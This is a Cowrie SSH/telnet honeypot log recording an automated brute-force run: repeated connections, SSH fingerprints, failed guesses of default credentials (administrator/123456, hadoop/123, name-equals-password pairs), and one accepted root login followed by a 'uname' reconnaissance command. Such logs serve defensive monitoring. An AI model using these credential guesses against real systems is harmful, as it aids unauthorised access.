{"eventid":"cowrie.login.success","username":"root","password":"1","message":"login attempt [root/1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:41:14.506913Z","src_ip":"212.227.125.160","session":"db02f4757b90"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:41:14.630785Z","src_ip":"212.227.125.160","session":"db02f4757b90"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:41:14.631454Z","src_ip":"212.227.125.160","session":"db02f4757b90"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:41:14.694944Z","src_ip":"212.227.125.160","session":"db02f4757b90"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:41:14.696055Z","src_ip":"212.227.125.160","session":"db02f4757b90"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:41:18.067633Z","src_ip":"212.227.235.229","session":"745e7f314b99"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34332,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a8abc532e3a","protocol":"ssh","message":"New connection: 212.227.125.160:34332 (1.2.3.4:22) [session: 3a8abc532e3a]","sensor":"my-vps","timestamp":"2025-08-26T21:41:21.191996Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:41:21.196497Z","src_ip":"212.227.125.160","session":"3a8abc532e3a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:41:21.261489Z","src_ip":"212.227.125.160","session":"3a8abc532e3a"}
{"eventid":"cowrie.login.failed","username":"emps","password":"emps","message":"login attempt [emps/emps] failed","sensor":"my-vps","timestamp":"2025-08-26T21:41:21.451076Z","src_ip":"212.227.125.160","session":"3a8abc532e3a"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:41:23.048380Z","src_ip":"212.227.125.160","session":"3a8abc532e3a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57952,"dst_ip":"1.2.3.4","dst_port":22,"session":"e03635df1262","protocol":"ssh","message":"New connection: 212.227.125.160:57952 (1.2.3.4:22) [session: e03635df1262]","sensor":"my-vps","timestamp":"2025-08-26T21:41:26.224374Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:41:26.225387Z","src_ip":"212.227.125.160","session":"e03635df1262"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:41:26.289869Z","src_ip":"212.227.125.160","session":"e03635df1262"}
{"eventid":"cowrie.login.failed","username":"ball","password":"ball","message":"login attempt [ball/ball] failed","sensor":"my-vps","timestamp":"2025-08-26T21:41:26.480963Z","src_ip":"212.227.125.160","session":"e03635df1262"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:41:27.542203Z","src_ip":"212.227.125.160","session":"e03635df1262"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53342,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a3b222fd322","protocol":"ssh","message":"New connection: 212.227.125.160:53342 (1.2.3.4:22) [session: 3a3b222fd322]","sensor":"my-vps","timestamp":"2025-08-26T21:41:31.813073Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:41:31.814134Z","src_ip":"212.227.125.160","session":"3a3b222fd322"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:41:31.867721Z","src_ip":"212.227.125.160","session":"3a3b222fd322"}
{"eventid":"cowrie.login.failed","username":"emqx","password":"emqx","message":"login attempt [emqx/emqx] failed","sensor":"my-vps","timestamp":"2025-08-26T21:41:32.195346Z","src_ip":"212.227.125.160","session":"3a3b222fd322"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:41:33.242839Z","src_ip":"212.227.125.160","session":"3a3b222fd322"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48728,"dst_ip":"1.2.3.4","dst_port":22,"session":"f70a9f68341c","protocol":"ssh","message":"New connection: 212.227.125.160:48728 (1.2.3.4:22) [session: f70a9f68341c]","sensor":"my-vps","timestamp":"2025-08-26T21:41:37.404911Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:41:37.429433Z","src_ip":"212.227.125.160","session":"f70a9f68341c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:41:37.454334Z","src_ip":"212.227.125.160","session":"f70a9f68341c"}
{"eventid":"cowrie.login.failed","username":"man","password":"man","message":"login attempt [man/man] failed","sensor":"my-vps","timestamp":"2025-08-26T21:41:37.658906Z","src_ip":"212.227.125.160","session":"f70a9f68341c"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:41:38.710723Z","src_ip":"212.227.125.160","session":"f70a9f68341c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59277,"dst_ip":"1.2.3.4","dst_port":23,"session":"c6fc84bad572","protocol":"telnet","message":"New connection: 212.227.125.160:59277 (1.2.3.4:23) [session: c6fc84bad572]","sensor":"my-vps","timestamp":"2025-08-26T21:41:41.072151Z"}
{"eventid":"cowrie.session.closed","duration":37.891334772109985,"message":"Connection lost after 37 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:41:42.793785Z","src_ip":"212.227.125.160","session":"66f2cf809f5c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44114,"dst_ip":"1.2.3.4","dst_port":22,"session":"c58efc431819","protocol":"ssh","message":"New connection: 212.227.125.160:44114 (1.2.3.4:22) [session: c58efc431819]","sensor":"my-vps","timestamp":"2025-08-26T21:41:43.358257Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:41:43.360264Z","src_ip":"212.227.125.160","session":"c58efc431819"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:41:43.458995Z","src_ip":"212.227.125.160","session":"c58efc431819"}
{"eventid":"cowrie.login.failed","username":"ciuser","password":"ciuser","message":"login attempt [ciuser/ciuser] failed","sensor":"my-vps","timestamp":"2025-08-26T21:41:43.612072Z","src_ip":"212.227.125.160","session":"c58efc431819"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:41:44.743207Z","src_ip":"212.227.125.160","session":"c58efc431819"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39502,"dst_ip":"1.2.3.4","dst_port":22,"session":"71c5cb2d8129","protocol":"ssh","message":"New connection: 212.227.125.160:39502 (1.2.3.4:22) [session: 71c5cb2d8129]","sensor":"my-vps","timestamp":"2025-08-26T21:41:49.118821Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:41:49.121319Z","src_ip":"212.227.125.160","session":"71c5cb2d8129"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:41:49.163101Z","src_ip":"212.227.125.160","session":"71c5cb2d8129"}
{"eventid":"cowrie.login.failed","username":"amir","password":"amir","message":"login attempt [amir/amir] failed","sensor":"my-vps","timestamp":"2025-08-26T21:41:49.345102Z","src_ip":"212.227.125.160","session":"71c5cb2d8129"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:41:50.495991Z","src_ip":"212.227.125.160","session":"71c5cb2d8129"}
{"eventid":"cowrie.session.closed","duration":13.423048257827759,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:41:54.495113Z","src_ip":"212.227.125.160","session":"c6fc84bad572"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34888,"dst_ip":"1.2.3.4","dst_port":22,"session":"e27a3f61ff40","protocol":"ssh","message":"New connection: 212.227.125.160:34888 (1.2.3.4:22) [session: e27a3f61ff40]","sensor":"my-vps","timestamp":"2025-08-26T21:41:54.644552Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:41:54.645594Z","src_ip":"212.227.125.160","session":"e27a3f61ff40"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:41:54.697240Z","src_ip":"212.227.125.160","session":"e27a3f61ff40"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"123456","message":"login attempt [administrator/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T21:41:54.868119Z","src_ip":"212.227.125.160","session":"e27a3f61ff40"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:41:55.943992Z","src_ip":"212.227.125.160","session":"e27a3f61ff40"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58506,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0c790b962ac","protocol":"ssh","message":"New connection: 212.227.125.160:58506 (1.2.3.4:22) [session: e0c790b962ac]","sensor":"my-vps","timestamp":"2025-08-26T21:42:00.387478Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:42:00.388728Z","src_ip":"212.227.125.160","session":"e0c790b962ac"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:42:00.434848Z","src_ip":"212.227.125.160","session":"e0c790b962ac"}
{"eventid":"cowrie.login.failed","username":"user5","password":"user5","message":"login attempt [user5/user5] failed","sensor":"my-vps","timestamp":"2025-08-26T21:42:00.578945Z","src_ip":"212.227.125.160","session":"e0c790b962ac"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:42:01.634527Z","src_ip":"212.227.125.160","session":"e0c790b962ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53896,"dst_ip":"1.2.3.4","dst_port":22,"session":"b4f66fdeac3e","protocol":"ssh","message":"New connection: 212.227.125.160:53896 (1.2.3.4:22) [session: b4f66fdeac3e]","sensor":"my-vps","timestamp":"2025-08-26T21:42:05.985703Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:42:05.986846Z","src_ip":"212.227.125.160","session":"b4f66fdeac3e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:42:06.031943Z","src_ip":"212.227.125.160","session":"b4f66fdeac3e"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123","message":"login attempt [hadoop/123] failed","sensor":"my-vps","timestamp":"2025-08-26T21:42:06.165888Z","src_ip":"212.227.125.160","session":"b4f66fdeac3e"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:42:07.213001Z","src_ip":"212.227.125.160","session":"b4f66fdeac3e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49284,"dst_ip":"1.2.3.4","dst_port":22,"session":"d08fc33e0810","protocol":"ssh","message":"New connection: 212.227.125.160:49284 (1.2.3.4:22) [session: d08fc33e0810]","sensor":"my-vps","timestamp":"2025-08-26T21:42:11.285442Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:42:11.311297Z","src_ip":"212.227.125.160","session":"d08fc33e0810"}
